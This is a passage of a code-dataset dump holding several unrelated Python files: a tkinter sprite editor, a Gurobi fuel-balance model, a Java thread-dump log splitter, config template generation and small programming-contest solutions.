result of the split\r\n \r\n \r\n splits = 0\r\n numcols = 0\r\n for cols in csprites:\r\n if numcols < len(cols):\r\n numcols = len(cols)\r\n if numcols > 0:\r\n splits = 1\r\n if numcols > 1:\r\n splits = 2\r\n if numcols > 2:\r\n splits = 2\r\n return splits\r\ndef createTempSprites (app):\r\n #Creates two arrays, uspritrs, which holds the pattern in colors (1,2,3....)\r\n #Csprites which holds the colors that are used in each line of the sprite\r\n if (app.spixels == []):\r\n 
retrofunctions.getPixels(app,app.spixels)\r\n app.usprites = []\r\n app.csprites = []\r\n app.spritescoords = []\r\n app.spritesPerRow = int(app.imgwidth/app.spritexsize)\r\n app.spritesPerCol = int(app.imgheight/app.spriteysize)\r\n for spy in range (0,app.spritesPerCol):\r\n for spx in range (0,app.spritesPerRow):\r\n thissprite = []\r\n thisspritecolors=[]\r\n for py in range (0,app.spriteysize):\r\n thiscolors = [] #Background is a must have as color\r\n srow =\"\" # Holds the scanned row of each sprite\r\n # Since color can be more than 1, we need a color indicator\r\n for px in range (0,app.spritexsize):\r\n\r\n #WIP\r\n position = ((spx*app.spritexsize)+px)+((app.spriteysize*app.imgwidth*spy)+(py*app.imgwidth))\r\n imgRow = int ((position)/app.imgwidth)+1\r\n extraRowUpper = imgRow+int(app.sprImgOffset/app.imgwidth)\r\n extraRowLower = imgRow+int(app.sprImgOffset/app.imgwidth)-1\r\n upperlimit = (app.imgwidth)*extraRowUpper\r\n lowerlimit = (app.imgwidth)*extraRowLower\r\n position = position + app.sprImgOffset\r\n ### We need to calculate the offset\r\n if ((position < len(app.spixels)) and (position >= 0) and (position < upperlimit) and (position >= lowerlimit)):\r\n color = str(app.spixels[position])\r\n else:\r\n color = \"0\"\r\n if (color not in thiscolors) and (int(color) != 0):\r\n thiscolors.append (color)\r\n srow = srow + \"%\" + color\r\n thissprite.append(srow)\r\n thisspritecolors.append(thiscolors)\r\n app.spritescoords.append ([spx,spy])\r\n app.usprites.append (thissprite)\r\n app.csprites.append (thisspritecolors)\r\n \r\ndef createFinalSprites(app):\r\n #create the deifnitive sprite patterns (0,1), and splits sprites that need to be ored\r\n app.finalsprites=[] \r\n myindex = 0\r\n tusprites = app.usprites[:]\r\n for usprite in tusprites:\r\n ored = False\r\n needtoor = needToOr(app.csprites[myindex],app)\r\n if needtoor == -1:\r\n break\r\n spritesplit = getSplits (app.csprites[myindex])\r\n for numsprites in range (0,spritesplit):\r\n tsprite =[]\r\n tcolor = []\r\n emptySprite = True\r\n for y in range (0,app.spriteysize):\r\n pc=findOrColor(app.csprites[myindex][y],app)\r\n oc=pc[2]\r\n trow = \"\";\r\n row = usprite[y]\r\n for x in range (0,app.spritexsize):\r\n pcolor = retrofunctions.getTempColor (row,x)\r\n if (int(pcolor)==int(pc[numsprites])) or (int(pcolor)==int(oc)):\r\n trow = trow+\"1\"\r\n emptySprite = False\r\n else:\r\n trow = trow+\"0\"\r\n tsprite.append(trow)\r\n if pc[numsprites]==-1:\r\n tcolor.append (0)\r\n else:\r\n tcolor.append (pc[numsprites])\r\n if not emptySprite:\r\n mysprite = retroclasses.sprite (tsprite,tcolor,ored,app.spritescoords[myindex][0],app.spritescoords[myindex][1]) ## X,Y Candidate (for BASIC EXPORT)\r\n app.finalsprites.append(mysprite)\r\n #print (len(app.finalsprites))\r\n if needtoor:\r\n ored = not ored\r\n myindex = myindex+1\r\ndef showSprites (app):\r\n #display the sprites grid, initializing everything first\r\n if hasattr(app.img,'filename'):\r\n if (app.img.filename == config.logoimage) and (app.spixels ==[]) and (app.tpixels==[]) :\r\n tk.messagebox.showinfo(\"Error\",\"Please, load an image or start a new project first\")\r\n return 1\r\n if set(app.bgcolor) == set((-1,-1,-1)) and (app.spixels ==[]) and (app.tpixels==[]):\r\n tk.messagebox.showinfo(\"Error\",\"Please, click on the background color of the image first\")\r\n return 1\r\n if (app.spwindow!=None):\r\n if (app.spritesCanvas != None) and (app.spwindow.winfo_exists()!=0): \r\n for child in app.spwindow.winfo_children():\r\n child.destroy()\r\n 
app.spritesCanvas = None\r\n else:\r\n createSpritesWindow(app)\r\n retrofunctions.displayPalette(app)\r\n else:\r\n createSpritesWindow(app)\r\n \r\n createTempSprites(app)\r\n if app.usprites != []:\r\n createFinalSprites(app)\r\n app.spwindow.deiconify()\r\n numSprites = len(app.usprites)\r\n if (app.imgwidth!=0):\r\n app.spritesPerRow = int(math.ceil(app.imgwidth/app.spritexsize))\r\n app.spritePerCol = int(math.ceil(numSprites/app.spritesPerRow))\r\n xsize = (app.spritexsize)*app.pixelsize\r\n ysize = (app.spriteysize)*app.pixelsize\r\n spacing = 4\r\n canvasWidth = app.spritesPerRow *(xsize+spacing)\r\n canvasHeight = app.spritePerCol*(ysize+spacing)\r\n shownSprites = 0\r\n app.spritesCanvas = tk.Canvas (app.spwindow,width=canvasWidth,height=canvasHeight,scrollregion=(0, 0, canvasWidth, canvasHeight))\r\n # Mous click actions left-> Put pixel, Right-> Remove pixel\r\n app.spritesCanvas.bind('', lambda x:updatePixel(app.spritesCanvas,True,app))\r\n #app.spritesCanvas.bind(\"\",lambda event: moveSpriteCanvas(app.spritesCanvas,x = event.x,y = event.y))\r\n app.spritesCanvas.bind('', lambda x:selectSprite(app.spritesCanvas,app))\r\n # Canvas by default does not get focus, so this means that if this is not set\r\n # key binding will not work!\r\n app.spritesCanvas.bind('', lambda event:moveSprites(event,app.spritesCanvas,app))\r\n\r\n if canvasWidth>config.appxsize:\r\n #add horizontal scroll\r\n xscrollbar = tk.Scrollbar(app.spwindow,orient=tk.HORIZONTAL)\r\n xscrollbar.pack (side=tk.BOTTOM, fill=tk.X)\r\n app.spritesCanvas.config(xscrollcommand=xscrollbar.set)\r\n xscrollbar.config(command=app.spritesCanvas.xview)\r\n if canvasHeight>config.appysize:\r\n #add vertical scroll\r\n yscrollbar = tk.Scrollbar(app.spwindow)\r\n yscrollbar.pack (side=tk.RIGHT, fill=tk.Y)\r\n app.spritesCanvas.config(yscrollcommand=yscrollbar.set)\r\n yscrollbar.config(command=app.spritesCanvas.yview)\r\n\r\n #Add scroll commands:\r\n\r\n app.spritesCanvas.pack()\r\n app.spritesCanvas.focus_set()\r\n currX = 1\r\n currY = 1\r\n currentSprite = 0\r\n for row in range (0,numSprites):\r\n destX = currX + (xsize)\r\n destY = currY + (ysize)\r\n tags = \"sprite,spr\"+str(currentSprite)+\"canvas\"\r\n app.spritesCanvas.create_rectangle(currX,currY,destX,destY,width=(spacing/2),tags=tags)\r\n #draw each \"boxel\" of the sprite\r\n retrofunctions.drawboxel (app,app.spritesCanvas,app.usprites[currentSprite],currX,currY,currentSprite,app.spritexsize,config.spriteeditorbgcolor,tags)\r\n currX = currX+(xsize+spacing)\r\n currentSprite = currentSprite + 1\r\n shownSprites = shownSprites + 1\r\n if shownSprites == app.spritesPerRow:\r\n currX = 1\r\n currY = currY + (ysize+spacing)\r\n shownSprites=0\r\n retrofunctions.displayPalette(app)\r\n # If canvas is bigger than screen then show scrollbars\r\n\r\ndef moveSpriteCanvas(canvas,x,y):\r\n print (\"moving\"+str(x)+\"//\"+str(y))\r\n \r\ndef moveSprites(event,canvas,app):\r\n \"\"\"\r\n Left 37\r\n Up\t 38\r\n Right 39\r\n Down 40\r\n \"\"\"\r\n if int(event.keycode) == 38:\r\n app.sprImgOffset = app.sprImgOffset + app.imgwidth\r\n if int(event.keycode) == 40:\r\n app.sprImgOffset = app.sprImgOffset - app.imgwidth\r\n if int(event.keycode) == 37:\r\n app.sprImgOffset = app.sprImgOffset +1\r\n if int(event.keycode) == 39:\r\n app.sprImgOffset = app.sprImgOffset -1\r\n app.usprites = []\r\n app.csprites = []\r\n createTempSprites (app)\r\n showSprites(app)\r\ndef selectSprite(canvas,app):\r\n print (canvas.gettags(\"sprite\"))\r\ndef updatePixel (canvas,switchon,app):\r\n 
    fill = app.spriteeditorbgcolor\r\n    tags = canvas.gettags(tk.CURRENT)\r\n    if len(tags)<2:\r\n        return\r\n    if (switchon) and (app.drawColor != 0):\r\n        fill = retrofunctions.transformColor(app,app.drawColor)\r\n\r\n    if canvas.find_withtag(tk.CURRENT):\r\n        canvas.itemconfig(tk.CURRENT, fill=fill)\r\n        coords = tags[0].split('/')\r\n        spriteidx = int(coords[0])\r\n        px = int(coords[1])\r\n        py = int(coords[2])\r\n        sprite = app.usprites[spriteidx]\r\n        row = sprite[py]\r\n        row = retrofunctions.updateTempColor (row,px,app.drawColor)\r\n        row = list(map(str,row))\r\n        row = ''.join(row)\r\n        sprite[py]=row\r\n        app.usprites[spriteidx]=sprite\r\n        \r\n        # Update pixels object\r\n        # need to convert sprite/pixel/pxpy\r\n        # We have the sprite ID and the pixel coordinates inside the sprite\r\n        position = ((spriteidx*app.spritexsize)+px)+(py*app.imgwidth)\r\n        app.spixels[position]=str(app.drawColor)\r\n        canvas.update_idletasks()\r\n\r\ndef createSpritesWindow(app):\r\n    #window to show the sprites in\r\n    app.spwindow = tk.Toplevel(app.root)\r\n    app.spwindow.title(\"Sprite Overview\")\r\n    app.spwindow.iconbitmap(config.iconfile)\r\n    app.spwindow.geometry(str(config.appxsize)+\"x\"+str(config.appysize))\r\n    app.spwindow.protocol(\"WM_DELETE_WINDOW\", lambda:closeSpritesWindow(app))\r\n    app.spwindow.withdraw()\r\n    #scrollbar = tk.Scrollbar(app.spwindow, command=closeSprites(app))\r\n    #scrollbar.pack(side=tk.RIGHT, fill='y')\r\n\r\ndef chgNbrSprites(value,app):\r\n    app.newSprites = int(value.get())\r\n\r\ndef chgSprXSize(value,app):\r\n    app.spritexsize = int(value.get())\r\n\r\ndef chgSprYSize(value,app):\r\n    app.spriteysize = int(value.get())\r\n    \r\ndef chgPixelSize(value,app):\r\n    app.pixelsize = int(value.get())\r\n    \r\n\r\ndef createAnimationWindow (app):\r\n    app.animWindow = tk.Toplevel(app.root)\r\n    app.animWindow.title(\"Character Animation\")\r\n    app.animWindow.iconbitmap(config.iconfile)\r\n    app.animWindow.geometry(str(config.animWxSize)+\"x\"+str(config.animWySize))\r\n    app.animWindow.protocol(\"WM_DELETE_WINDOW\", lambda:retrofunctions.closeAnimationWindow(app))\r\n\r\n    e = tk.Entry(app.animWindow)\r\n    e.insert (0,app.animArray)\r\n    w = tk.Entry(app.animWindow)\r\n    w.insert (0,app.animCols)\r\n    h = tk.Entry(app.animWindow)\r\n    h.insert (0,app.animRows)\r\n    b = tk.Button(app.animWindow, text=\"update sprites\",command = lambda:updateAnimation(app,e,w,h))\r\n    e.pack()\r\n    w.pack()\r\n    h.pack()\r\n    b.pack()\r\n    \r\n    \r\n    \r\ndef updateAnimation(app,e,w,h):\r\n    app.animArray = e.get().split(' ')\r\n    app.animCols = int(w.get())\r\n    app.animRows = int(h.get())\r\n    \r\n    animate (app)\r\n    \r\n    \r\ndef animate (app):\r\n    if (app.csprites == []):\r\n        tk.messagebox.showinfo(\"Error\",\"Please, create sprites before trying to animate them ;-)\")\r\n        return 1\r\n    \r\n    app.animation = retroclasses.animation()\r\n    \r\n    for ch in app.animArray:\r\n        ch =int(ch)\r\n        character = retroclasses.character (app.animRows,app.animCols)\r\n        for y in range (0,app.animRows):\r\n            for x in range (0,app.animCols):\r\n                #(MOD(ch;(ssr/animcol))*animcol)+(int(ch/(ssr/animcol))*animrows*ssr)+x+(y*ssr)\r\n\r\n                idx = ( (ch % int(app.spritesPerRow/app.animCols))*app.animCols)+(int(ch/(app.spritesPerRow/app.animCols))*app.animRows*app.spritesPerRow)+x+(y*app.spritesPerRow)\r\n                character.insertSprite(app.usprites[idx],y,x)\r\n        app.animation.addCharacter(character)\r\n    \r\n    animWxSize = app.spritexsize*app.animCols*config.pixelsize\r\n    animWySize = app.spriteysize*app.animRows*config.pixelsize\r\n    \r\n    if app.animWindow != \"\":\r\n        app.animWindow.destroy()\r\n
    createAnimationWindow (app)\r\n    app.animCanvas = tk.Canvas (app.animWindow,width=animWxSize,height=animWySize)\r\n    app.animCanvas.bind('<Key>', lambda event:animateSprite(event,app))\r\n\r\n    app.animCanvas.pack()\r\n    app.animCanvas.focus_set()\r\n\r\n    app.frame = 0\r\n    animateSprite(None,app)\r\n\r\n\r\n\r\n\r\ndef animateSprite (event,app):\r\n    if event != None:\r\n        if int(event.keycode) == 37:\r\n            app.frame = app.frame+1\r\n        if int(event.keycode) == 39:\r\n            app.frame = app.frame -1\r\n    if app.frame >= app.animation.numFrames():\r\n        app.frame = 0\r\n    if app.frame < 0 :\r\n        app.frame = app.animation.numFrames()-1\r\n    xsize = (app.spritexsize)*app.pixelsize\r\n    ysize = (app.spriteysize)*app.pixelsize\r\n    spacing = 2\r\n    currX = 1\r\n    currY = 1\r\n    app.animCanvas.delete(\"all\")\r\n    for row in range (app.animation.characters[app.frame].rows):\r\n        for col in range (app.animation.characters[app.frame].cols):\r\n            destX = currX + (xsize)\r\n            destY = currY + (ysize)\r\n            app.animCanvas.create_rectangle(currX,currY,destX,destY,width=(spacing/2))\r\n            #draw each \"boxel\" of the sprite\r\n            retrofunctions.drawboxel (app,app.animCanvas,app.animation.characters[app.frame].sprites[row][col],currX,currY,config.spriteeditorbgcolor,\"\")\r\n            currX = currX+(xsize+spacing)\r\n        currX = 1\r\n        currY = currY + (ysize+spacing)\r\n    app.animWindow.update()\r\n    app.root.update()\r\n    \r\ndef closeSpritesWindow(app):\r\n    #Destroy sprite window so next time it is open it is reinitialized\r\n    app.spwindow.destroy()\r\n","repo_name":"zayamatias/retrotool","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":16804,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"27065318210","text":"import pandas as pd\nimport numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB\n\noil_box_info_path = 'F:\\\\python_workspace\\\\2020F\\\\题目\\\\oil_box_info.xlsx'\noil_box_data = pd.read_excel(oil_box_info_path)\n\n\n# id: oil tank index 0-5; v: current oil volume in the tank; alpha: pitch angle, range (-90, 90) degrees; return: centroid coordinates\ndef calCentroid(id, v):\n    oil_info = oil_box_data.iloc[id, :]\n    centroid = [oil_info['x'], oil_info['y'], 0]\n    s_input = v / oil_info['w']\n    s_total = oil_info['l'] * oil_info['h']\n    centroid[2] = oil_info['z'] - 0.5 * (s_total - s_input) / oil_info['l']\n    return centroid\n\n\nq1_path = 'F:\\\\python_workspace\\\\2020F\\\\题目\\\\2020年F题--飞行器质心平衡供油策略优化\\\\附件3-问题2数据.xlsx'\nq1_data = pd.read_excel(q1_path)\nq2_data = pd.read_excel(q1_path, sheet_name='飞行器理想质心数据')\nU = [1.1, 1.8, 1.7, 1.5, 1.6, 1.1]\nN = q1_data.iloc[:, 1].tolist()\nC = np.array(q2_data.iloc[:, 1:4])\nV0 = [0.3, 1.5, 2.1, 1.9, 2.6, 0.8]\nVm = [0.405, 1.936, 2.376, 2.652, 2.88, 1.2]\n\nNN = np.cumsum(N)\n\n\n# v0-v5: current oil volume in each of the 6 tanks at time step t\ndef calTotalCentroid(v0, v1, v2, v3, v4, v5, t):\n    #print(NN[1000])\n    v = [v0, v1, v2, v3, v4, v5]\n    oil_m = 850 * np.array(v)\n    centroidList = []\n    for i in range(6):\n        centroidList.append(calCentroid(i, v[i]))\n    #print(centroidList)\n    s = [0, 0, 0]\n    for i in range(6):\n        for j in range(3):\n            s[j] += oil_m[i] * centroidList[i][j]\n    # return np.array(s / np.array(sum(oil_m) + 3000))\n    #print(np.array(s / np.array(9.2 * 850 - NN[t] + 3000)))\n    return np.array(s / np.array(9.2 * 850 - NN[t] + 3000))\n\n\n# a = [1, 2, 3]\n# b = [1, 2, 5]\n# print(sum((np.array(a) - np.array(b)) * (np.array(a) - np.array(b))))\n\nm = gp.Model(\"1\")\nw = m.addVars(6, 7200, vtype=GRB.BINARY)\nx = m.addVars(6, 7200, vtype=GRB.CONTINUOUS, lb=0)\nF = m.addVars(6, 7200, vtype=GRB.INTEGER, lb=0)\nv = m.addVars(6, 
7200, vtype=GRB.CONTINUOUS, lb=0)\nz = m.addVar(vtype=GRB.CONTINUOUS, lb=0)\nerr = m.addVars(7200, 3, vtype=GRB.CONTINUOUS, lb=0)\n\nm.setObjective(z, GRB.MINIMIZE)\n# m.setObjective(\n# max(((calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t]) *\n# (calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])).sum() for t in range(7200)), GRB.MINIMIZE)\n\nm.addConstrs(x[i, t] <= w[i, t] * U[i] for i in range(6) for t in range(7200))\nm.addConstrs(gp.quicksum(w[i, t] for i in range(1, 5)) <= 2 for t in range(7200))\nm.addConstrs(gp.quicksum(w[i, t] for i in range(6)) <= 3 for t in range(7200))\nm.addConstrs(x[i, t] >= N[t] for i in range(6) for t in range(7200))\nm.addConstrs(v[i, 0] == V0[i] for i in range(6))\nm.addConstrs(v[i, t] == v[i, t - 1] - x[i, t - 1] / 850 for i in [0, 2, 3, 5] for t in range(1, 7200))\nm.addConstrs(v[1, t] == v[1, t - 1] - x[1, t - 1] / 850 + x[0, t - 1] / 850 for t in range(1, 7200))\nm.addConstrs(v[4, t] == v[4, t - 1] - x[4, t - 1] / 850 + x[5, t - 1] / 850 for t in range(1, 7200))\nm.addConstrs(v[i, t] <= Vm[i] for i in range(6) for t in range(7200))\nm.addConstrs(F[i, t] == w[i, t] * (F[i, t - 1] + 1) for i in range(6) for t in range(1, 7200))\nm.addConstrs((F[i, t - 1] - 60) * (w[i, t - 1] - w[i, t]) >= 0 for i in range(6) for t in range(1, 7200))\n\nm.addConstrs(err[t, i] == list(calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])[i] for i in range(3) for t in range(7200))\nm.addConstrs(\n np.array(err[t, 0]) * np.array(err[t, 0]) + np.array(err[t, 1]) * np.array(err[t, 1]) + np.array(err[t, 2]) * np.array(err[t, 2]) <= z\n for t in range(7200))\n# m.addConstrs(\n# sum((calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t]) *\n# (calTotalCentroid(v[0, t], v[1, t], v[2, t], v[3, t], v[4, t], v[5, t], t) - C[t])) <= z for t in range(7200))\n\nm.optimize()\n\n# a = calTotalCentroid(0, 0.1, 0.2, 0.3, 0.4, 0.3, 1) - C[1]\n# print(sum(a * a))\n","repo_name":"zsm982202/MechineLearning_python3","sub_path":"2020F/2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"29343734764","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nimport re\nimport stat\nimport sys\n\ntimestamp_text = '^\\d\\d\\d\\d-\\d\\d-\\d\\d \\d\\d:\\d\\d:\\d\\d$'\ntimestamp_pattern = re.compile(timestamp_text)\n\nclass LogSplitter:\n\n\t# Split by date\n\n\tdef split(self, foldername, filename):\n\n\t\t# Create the folder if it does not yet exist.\n\n\t\tif not os.path.exists(foldername):\n\t\t\tos.mkdir(foldername)\n\t\t\tos.chmod(foldername, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n\n\t\tlines = open(filename, 'r')\n\n\t\t# Search for the date format emitted at the top of every\n\t\t# standard dump and continues searching until it sees two empty\n\t\t# lines in a row.\n\n\t\tthread_dump = False\n\t\tthread_dump_file = None\n\n\t\tlast_line_blank = False\n\t\tcounter = 0\n\n\t\tfor line in lines:\n\t\t\tline = line.rstrip()\n\n\t\t\t# If you are currently parsing a thread dump, then check\n\t\t\t# for an empty line.\n\n\t\t\t# If you have reached the beginning of a thread dump, flag\n\t\t\t# it as such and open a file. 
For simplicity, use a name\n\t\t\t# which matches the timestamp.\n\n\t\t\tif timestamp_pattern.match(line):\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\telse:\n\t\t\t\t\tthread_dump = True\n\n\t\t\t\tlast_line_blank = False\n\n\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\tfoldername, 'thread_' + re.sub('[^\\d]', '', line))\n\n\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\n\t\t\telif last_line_blank and line.find('Full thread dump') == 0:\n\t\t\t\tcounter += 1\n\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\telse:\n\t\t\t\t\tthread_dump = True\n\n\t\t\t\tlast_line_blank = False\n\n\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\tfoldername, 'thread_%05d' % counter)\n\n\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\n\t\t\telif thread_dump:\n\n\t\t\t\t# If the last line was also blank, you have just seen\n\t\t\t\t# two empty lines in a row so you have reached the end of\n\t\t\t\t# your thread dump. Otherwise, you've seen your first\n\t\t\t\t# blank line so you should track it.\n\n\t\t\t\tif len(line) == 0:\n\t\t\t\t\tif last_line_blank:\n\t\t\t\t\t\tthread_dump = False\n\t\t\t\t\t\tthread_dump_file.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast_line_blank = True\n\n\t\t\t\t# If you did not see an empty line, reset the flag for\n\t\t\t\t# tracking the last blank line.\n\n\t\t\t\telse:\n\t\t\t\t\tlast_line_blank = False\n\n\t\t\t# Write to the thread dump file if you've decided that you\n\t\t\t# are in the middle of parsing a thread dump.\n\n\t\t\tif thread_dump:\n\t\t\t\tthread_dump_file.write(line)\n\t\t\t\tthread_dump_file.write('\\n')\n\n\t\tif thread_dump:\n\t\t\tthread_dump_file.close()\n\t\t\tos.chmod(thread_dump_filename, stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH)\n\n\t# Split each instance of a thread into its own file\n\n\tdef split_thread(self, foldername, filename):\n\t\t# Create the folder if it does not yet exist.\n\n\t\tif not os.path.exists(foldername):\n\t\t\tos.mkdir(foldername)\n\n\t\theader_line = None\n\t\tlines = open(filename, 'r')\n\t\tthread_dump = False\n\t\tcounter = 0\n\n\t\tfiles = dict()\n\n\t\tfor line in lines:\n\t\t\tline = line.rstrip()\n\n\t\t\tif len(line) == 0:\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\t\t\t\t\tthread_dump = False\n\t\t\telif timestamp_pattern.match(line):\n\t\t\t\theader_line = line\n\t\t\telif line[0] == '\"':\n\t\t\t\tif thread_dump:\n\t\t\t\t\tthread_dump_file.close()\n\n\t\t\t\tthread_name = line[1:line.rfind('\"')]\n\n\t\t\t\tif thread_name in files:\n\t\t\t\t\tthread_dump_filename = files[thread_name]\n\t\t\t\t\tthread_dump_file = open(thread_dump_filename, 'a')\n\n\t\t\t\t\tthread_dump_file.write('\\n\\n')\n\t\t\t\t\tthread_dump_file.write(header_line)\n\t\t\t\t\tthread_dump_file.write('\\n')\n\t\t\t\telse:\n\t\t\t\t\tcounter += 1\n\n\t\t\t\t\t# thread_dump_filename = os.path.join(\n\t\t\t\t\t# \tfoldername, 'thread_%05d' % counter)\n\n\t\t\t\t\tthread_dump_filename = os.path.join(\n\t\t\t\t\t\tfoldername, 'thread_%s' % thread_name.replace('/', '_'))\n\n\t\t\t\t\tfiles[thread_name] = thread_dump_filename\n\t\t\t\t\tthread_dump_file = open(thread_dump_filename, 'w')\n\t\t\t\t\tthread_dump_file.write(header_line)\n\t\t\t\t\tthread_dump_file.write('\\n')\n\n\t\t\t\tthread_dump = True\n\n\t\t\tif thread_dump:\n\t\t\t\tthread_dump_file.write(line)\n\t\t\t\tthread_dump_file.write('\\n')\n\n\t\tif thread_dump:\n\t\t\tthread_dump_file.close()\n\t\t\tos.chmod(thread_dump_filename, 
stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH)\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 3:\n\t\tprint('syntax: python log_splitter.py \"/path/to/target/folder\" \"/path/to/source/file\"')\n\telse:\n\t\tsplitter = LogSplitter()\n\t\tsplitter.split(sys.argv[1], sys.argv[2])","repo_name":"holatuwol/liferay-faster-deploy","sub_path":"threads/log_splitter.py","file_name":"log_splitter.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"63"} +{"seq_id":"41951528045","text":"# pylint: disable=invalid-sequence-index\n\n\"\"\"Pairwise different summands\n\nGiven an integer 1 <= n <= 109 find the maximal number k such that n can be\nrepresented as a sum of pairwise different positive integers. In the first\nline output k, in the next line output k summands.\n\"\"\"\n\nfrom typing import List\n\n\ndef solve(num: int) -> List[int]:\n i = 1\n summands = []\n while num != 0:\n if num <= 2*i:\n summands.append(num)\n num = 0\n else:\n summands.append(i)\n num -= i\n i += 1\n return summands\n\n\ndef main():\n num = int(input().rstrip())\n result = solve(num)\n\n print(len(result))\n for item in result:\n print(item, end=' ')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lancelote/stepic_python_in_action_eng","sub_path":"solutions/s095.py","file_name":"s095.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7478163913","text":"import argparse\nfrom functools import partial\nfrom typing import NoReturn, TYPE_CHECKING\nif TYPE_CHECKING:\n from argparse import Namespace\n\nCONF_FORMAT = 'conf/{type}.conf'\nTMPL_FORMAT = 'template/{type}.tmpl'\n\n\nclass CmdType:\n\n FlaskEnv = 'flaskenv'\n Git = 'git'\n\n Vars = {\n FlaskEnv: {'app', 'port'},\n Git: {'email', 'name'},\n }\n\n\ndef handle(args: 'Namespace', type_: str) -> NoReturn:\n conf_path = CONF_FORMAT.format(type=type_)\n tmpl_path = TMPL_FORMAT.format(type=type_)\n vars_ = CmdType.Vars[type_]\n\n with open(tmpl_path) as f:\n tmpl = f.read()\n with open(conf_path, 'w') as f:\n conf = tmpl.format(**{var: getattr(args, var) for var in vars_})\n f.write(conf)\n\n\nparser = argparse.ArgumentParser(description='Desc: generate some config files.')\nsub_parser = parser.add_subparsers()\n\n# git parser\ngit = sub_parser.add_parser('git')\ngit.add_argument('-n', '--name', dest='name', metavar='name',\n help='your git username', required=True)\ngit.add_argument('-e', '--email', dest='email', metavar='email',\n help='your git email', required=True)\ngit.set_defaults(func=partial(handle, type_=CmdType.Git))\n\n# flaskenv parser\nflaskenv = sub_parser.add_parser('flaskenv')\nflaskenv.add_argument('-a', '--app', dest='app', metavar='app',\n help='your flask app path', required=False, default='app')\nflaskenv.add_argument('-p', '--port', dest='port', metavar='port',\n help='your flask run port', required=False, default=8888)\nflaskenv.set_defaults(func=partial(handle, type_=CmdType.FlaskEnv))\n\n# run parser\nargs = parser.parse_args()\nargs.func(args)\n","repo_name":"dyq666/chopper","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41658573668","text":"n=int(input())\na=0\nif n<0:\n n=-(n)\n a=1\nelse:\n n=n\nsum,mul=0,1\nwhile(n>0):\n rem=n%10\n sum=(sum*10)+rem\n 
n//=10\nif a==1:\n print(-(sum))\nelse:\n print(sum)\n \n","repo_name":"21P31A1243/codemind-python","sub_path":"Reverse_Integer.py","file_name":"Reverse_Integer.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40289140321","text":"'''\nhttps://programmers.co.kr/learn/courses/30/lessons/17682\n다트 게임\n0. 숫자, 보너스, 옵션에 대한 점수 계산\n1. 정규식 사용\n'''\nimport re\n\ndef solution(dartResult):\n record = re.findall('[0-9]{1,2}[SDT][*#]|[0-9]{1,2}[SDT]', dartResult)\n scores = []\n for i in record:\n a = int(''.join(re.findall('[0-9]', i)))\n b = ''.join(re.findall('[SDT]', i))\n c = ''.join(re.findall('[*#]', i))\n\n if b == 'S':\n score = a\n elif b == 'D':\n score = a ** 2\n else:\n score = a ** 3\n\n if c == \"*\":\n score *= 2\n if scores:\n scores[-1] *= 2\n elif c == \"#\":\n score = -score\n scores.append(score)\n\n return sum(scores)\n'''\nif문으로 해당 index의 값을 비교하기 보다는, 미리 딕셔너리화 해서 key값으로 바로 참조하기\n정규식을 좀 더 깔끔하게 쓸 것\ndef solution(dartResult):\n bonus = {'S' : 1, 'D' : 2, 'T' : 3}\n option = {'' : 1, '*' : 2, '#' : -1}\n p = re.compile('(\\d+)([SDT])([*#]?)')\n dart = p.findall(dartResult)\n for i in range(len(dart)):\n if dart[i][2] == '*' and i > 0:\n dart[i-1] *= 2\n dart[i] = int(dart[i][0]) ** bonus[dart[i][1]] * option[dart[i][2]]\n\n answer = sum(dart)\n return answer\n'''","repo_name":"DKU-STUDY/Algorithm","sub_path":"programmers/난이도별/level01.다트_게임/sangmandu.py","file_name":"sangmandu.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"ko","doc_type":"code","stars":147,"dataset":"github-code","pt":"63"} +{"seq_id":"32300383777","text":"# 백준 29220번 Свидание\nimport sys\nput = sys.stdin.readline\n\nk = int(put())\nn = int(put())\na = sorted(list(map(int, put().split())))\n\nif sum(a[1:]) >= k:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"KiwiDot/BOJ-Solution","sub_path":"29000 ~ 29999/29220번: 